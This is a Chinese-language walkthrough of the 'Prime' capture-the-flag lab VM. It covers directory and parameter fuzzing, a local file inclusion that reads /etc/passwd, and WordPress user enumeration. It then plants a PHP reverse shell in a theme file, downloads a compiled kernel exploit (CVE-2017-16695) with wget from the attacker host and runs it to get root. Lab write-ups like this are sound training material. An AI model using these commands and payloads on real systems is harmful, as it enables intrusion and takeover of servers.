Prime(wfuzz模糊测试,CVE-2017-16695)

发布于:2022-10-19 ⋅ 阅读:(595) ⋅ 点赞:(0)

环境准备

靶机链接:百度网盘 请输入提取码

提取码:eeqk

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息收集

1.探测目标靶机开放端口和服务

2.用gobuster进行目录扫描

gobuster dir -u http://192.168.1.100 \ -w /usr/share/wordlists/dirb/big.txt -t 50 -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

漏洞利用

1.访问/dev

2.访问secret.txt ,有一个location.txt文件,并且 它让访问一个github地址。

Fuzzing/Fuzz_For_Web at master · hacknpentest/Fuzzing · GitHub

3.查看后,是一个wfuzz测试命令

4.查到一个file
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 12 http://192.168.1.100/index.php?FUZZ

5.根据第二步提示访问location.txt

6.根据第五步提示,继续操作

7.访问/etc/passwd文件,在最下面说找到password.txt

http://192.168.1.100/image.php?secrettier360=/etc/passwd

8.访问后,拿到密码

finaly you got the right parameter

follow_the_ippsec

9.访问wordpress登录界面

10用wpscan工具枚举用户名

wpscan --url http://192.168.1.100/wordpress -e u

victor

11.只爆出一个用户,尝试登录下!

12.找到一个可以更改的网页

13.复制我的php-reverse-shell.php(github里有)文件的代码,进行保存

14.开启监听后访问下面网页,成功反弹shell

http://192.168.1.100/wordpress/wp-content/themes/twentynineteen/secret.php

权限提升(CVE-2017-16695)

1.用python回弹交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

2.用find命令查找有suid执行权限的文件,没有利用信息。

find / -perm -u=s -type f 2>/dev/null

3.查询靶机内核信息

4.searchsploit查到45010.c符合

searchsploit Ubuntu 16.04

5.searchsploit -m 45010.c //保存到本地

6.gcc 45010.c -o tiquan //编译文件

7.本地开启8000端口,靶机远程下载下来脚本

wget http://192.168.1.106:8000/tiquan

8.下载下来给个执行权限,运行后就是root权限,进入root目录,成功拿下!!!

本文含有隐藏内容,请 开通VIP 后查看

网站公告

今日签到

点亮在社区的每一天
去签到